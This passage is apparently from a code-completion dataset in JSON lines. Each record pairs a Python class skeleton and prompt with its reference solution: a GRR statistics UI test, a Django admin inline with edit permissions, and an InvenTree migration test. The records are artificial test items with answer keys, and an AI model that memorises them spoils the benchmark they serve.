'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n", "source": "the_stack_v2_python_sparse", "source_path": "lab_2/accumulate_diff_stats_test.py", "source_repo": "WhiteJaeger/2020-2-level-labs", "split": "test", "star_events_count": 0} {"blob_id": "aa6e36ac8681973a3dd671df0794440d6671ea5c", "bodies": ["token = access_control.ACLToken(username='test', reason='fixture')\nwith aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)", "self.Open('/')\nself.WaitUntil(self.IsElementPresent, 'client_query')\nself.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\nwith self.ACLChecksDisabled():\n self.CreateAdminUser('test')\nself.Open('/')\nself.WaitUntil(self.IsElementPresent, 'client_query')\nself.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\nself.Click(\"css=a:contains('Statistics')\")\nself.Click('css=#_Clients ins.jstree-icon')\nself.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\nself.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\nself.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\nself.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\nwith self.ACLChecksDisabled():\n self.PopulateData()\nself.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\nself.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')"], "bodies_text": "<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "class_docstring": "Test the statistics interface.", "class_name": "TestStats", "detected_licenses": ["Apache-2.0", "DOC"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000049", "length_bytes": 2708, "license_type": "permissive", "methods": [{"docstring": "Populates data into the stats object.", "name": "PopulateData", "signature": "def PopulateData()"}, {"docstring": "Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.", "name": "testStats", "signature": "def testStats(self)"}], "n_methods": 2, "prompt": "Implement the Python class `TestStats` described below.\n\nClass description:\nTest the statistics interface.\n\nMethod signatures and docstrings:\n- def PopulateData(): Populates data into the stats object.\n- def testStats(self): Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.", "prompted_full_text": "Implement the Python class `TestStats` described below.\n\nClass description:\nTest the statistics interface.\n\nMethod signatures and docstrings:\n- def PopulateData(): Populates data into the stats object.\n- def testStats(self): Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\n\n<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n<|end_body_1|>\n", "revision_id": "ba1648b97a76f844ffb8e1891cc9e2680f9b1c6e", "skeleton": "<|skeleton|>\nclass TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n <|body_0|>\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestStats:\n \"\"\"Test the statistics interface.\"\"\"\n\n def PopulateData():\n \"\"\"Populates data into the stats object.\"\"\"\n token = access_control.ACLToken(username='test', reason='fixture')\n with aff4.FACTORY.Create('aff4:/stats/ClientFleetStats', 'ClientFleetStats', token=token) as fd:\n now = 1321057655\n for i in range(10, 15):\n histogram = fd.Schema.OS_HISTOGRAM(age=int((now + i * 60 * 60 * 24) * 1000000.0))\n for number in [1, 7, 14, 30]:\n graph = rdfvalue.Graph(title='%s day actives' % number)\n graph.Append(label='Windows', y_value=i + number)\n graph.Append(label='Linux', y_value=i * 2 + number)\n histogram.Append(graph)\n fd.AddAttribute(histogram)\n\n def testStats(self):\n \"\"\"Test the statistics interface. Unfortunately this test is pretty lame because we can not look into the canvas object with selenium.\"\"\"\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.assert_(not self.IsElementPresent('css=a[grrtarget=ReadOnlyForemanRuleTable]'))\n with self.ACLChecksDisabled():\n self.CreateAdminUser('test')\n self.Open('/')\n self.WaitUntil(self.IsElementPresent, 'client_query')\n self.WaitUntil(self.IsElementPresent, 'css=a[grrtarget=ReadOnlyForemanRuleTable]')\n self.Click(\"css=a:contains('Statistics')\")\n self.Click('css=#_Clients ins.jstree-icon')\n self.Click('css=#_Clients-OS_20Breakdown ins.jstree-icon')\n self.WaitUntil(self.IsElementPresent, 'css=#_Clients-OS_20Breakdown-_207_20Day_20Active')\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'No data Available', self.GetText, 'css=#main_rightPane h3')\n with self.ACLChecksDisabled():\n self.PopulateData()\n self.Click(\"css=li[path='/Clients/OS Breakdown/ 7 Day Active'] a\")\n self.WaitUntilEqual(u'Operating system break down.', self.GetText, 'css=#main_rightPane h3')\n", "source": "the_stack_v2_python_sparse", "source_path": "gui/plugins/statistics_test.py", "source_repo": "defaultnamehere/grr", "split": "test", "star_events_count": 3} {"blob_id": "fd870f007d03036bafb3d1d54f73e97f37d00fa2", "bodies": ["if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\nelse:\n return False", "if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\nelse:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))", "if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\nelse:\n return 0"], "bodies_text": "<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UseCaseAdminInLine", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000050", "length_bytes": 18243, "license_type": "no_license", "methods": [{"docstring": "Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state", "name": "has_delete_permission", "signature": "def has_delete_permission(self, request, obj=None)"}, {"docstring": "Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state", "name": "get_readonly_fields", "signature": "def get_readonly_fields(self, request, obj=None)"}, {"docstring": "Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state", "name": "get_max_num", "signature": "def get_max_num(self, request, obj=None, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007088", "prompt": "Implement the Python class `UseCaseAdminInLine` described below.\n\nClass description:\nImplement the UseCaseAdminInLine class.\n\nMethod signatures and docstrings:\n- def has_delete_permission(self, request, obj=None): Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\n- def get_readonly_fields(self, request, obj=None): Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\n- def get_max_num(self, request, obj=None, **kwargs): Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state", "prompted_full_text": "Implement the Python class `UseCaseAdminInLine` described below.\n\nClass description:\nImplement the UseCaseAdminInLine class.\n\nMethod signatures and docstrings:\n- def has_delete_permission(self, request, obj=None): Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\n- def get_readonly_fields(self, request, obj=None): Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\n- def get_max_num(self, request, obj=None, **kwargs): Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\n\n<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n<|end_body_1|>\n\n<|body_start_2|>\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n<|end_body_2|>\n", "revision_id": "d9b330ef70b0d0985bfc8248612ba57ee46ff0f4", "skeleton": "<|skeleton|>\nclass UseCaseAdminInLine:\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n <|body_0|>\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\"\"\"\n <|body_1|>\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UseCaseAdminInLine:\n def has_delete_permission(self, request, obj=None):\n \"\"\"Overriding the method such that the delete option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The delete option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft or rejected state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status in ('draft', 'rejected'):\n return super(UseCaseAdminInLine, self).has_delete_permission(request, obj=None)\n else:\n return False\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Overriding the method such that all the fields on the UseCaseAdminInline form on change form are read-only for all the users except the original author or users with 'can_edit_all' permission. Only the original author or users with 'can_edit_all' permission can edit the fields that too when the related MUOContainer is in the 'draft' state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_readonly_fields(request, obj)\n else:\n return list(set([field.name for field in self.opts.local_fields] + [field.name for field in self.opts.local_many_to_many]))\n\n def get_max_num(self, request, obj=None, **kwargs):\n \"\"\"Overriding the method such that the 'Add another Use Case' option on the UseCaseAdminInline form on change form is not available for the users except the original author or users with 'can_edit_all' permission. The 'Add another UseCase' option is only available to the original author or users with 'can_edit_all' permission if the related MUOContainer is in draft state\"\"\"\n if obj is None:\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n elif (request.user == obj.created_by or request.user.has_perm('muo.can_edit_all')) and obj.status == 'draft':\n return super(UseCaseAdminInLine, self).get_max_num(request, obj=None, **kwargs)\n else:\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Code/EnhanceCWE-master/muo/admin.py", "source_repo": "happinesstaker/more-website", "split": "test", "star_events_count": 0} {"blob_id": "635c5bee25dbb5c2f14c3e1cb6c16f805c9dc727", "bodies": ["Company = self.old_state.apps.get_model('company', 'company')\ncustomer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\nSalesOrder = self.old_state.apps.get_model('order', 'salesorder')\nfor ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\norder.save()\nwith self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')", "SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\nShipment = self.new_state.apps.get_model('order', 'salesordershipment')\nself.assertEqual(SalesOrder.objects.count(), 5)\nself.assertEqual(Shipment.objects.count(), 5)"], "bodies_text": "<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "class_docstring": "Test data migration for the \"SalesOrderShipment\" model.", "class_name": "TestShipmentMigration", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000051", "length_bytes": 7688, "license_type": "permissive", "methods": [{"docstring": "Create an initial SalesOrder.", "name": "prepare", "signature": "def prepare(self)"}, {"docstring": "Check that a SalesOrderShipment has been created.", "name": "test_shipment_creation", "signature": "def test_shipment_creation(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002114", "prompt": "Implement the Python class `TestShipmentMigration` described below.\n\nClass description:\nTest data migration for the \"SalesOrderShipment\" model.\n\nMethod signatures and docstrings:\n- def prepare(self): Create an initial SalesOrder.\n- def test_shipment_creation(self): Check that a SalesOrderShipment has been created.", "prompted_full_text": "Implement the Python class `TestShipmentMigration` described below.\n\nClass description:\nTest data migration for the \"SalesOrderShipment\" model.\n\nMethod signatures and docstrings:\n- def prepare(self): Create an initial SalesOrder.\n- def test_shipment_creation(self): Check that a SalesOrderShipment has been created.\n\n<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n<|end_body_0|>\n\n<|body_start_1|>\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n<|end_body_1|>\n", "revision_id": "e88a8e99a5f0b201c67a95cba097c729f090d5e2", "skeleton": "<|skeleton|>\nclass TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n <|body_0|>\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestShipmentMigration:\n \"\"\"Test data migration for the \"SalesOrderShipment\" model.\"\"\"\n\n def prepare(self):\n \"\"\"Create an initial SalesOrder.\"\"\"\n Company = self.old_state.apps.get_model('company', 'company')\n customer = Company.objects.create(name='My customer', description='A customer we sell stuff too', is_customer=True)\n SalesOrder = self.old_state.apps.get_model('order', 'salesorder')\n for ii in range(5):\n order = SalesOrder.objects.create(reference=f'SO{ii}', customer=customer, description='A sales order for stuffs', status=SalesOrderStatus.PENDING.value)\n order.save()\n with self.assertRaises(LookupError):\n self.old_state.apps.get_model('order', 'salesordershipment')\n\n def test_shipment_creation(self):\n \"\"\"Check that a SalesOrderShipment has been created.\"\"\"\n SalesOrder = self.new_state.apps.get_model('order', 'salesorder')\n Shipment = self.new_state.apps.get_model('order', 'salesordershipment')\n self.assertEqual(SalesOrder.objects.count(), 5)\n self.assertEqual(Shipment.objects.count(), 5)\n", "source": "the_stack_v2_python_sparse", "source_path": "InvenTree/order/test_migrations.py", "source_repo": "inventree/InvenTree", "split": "test", 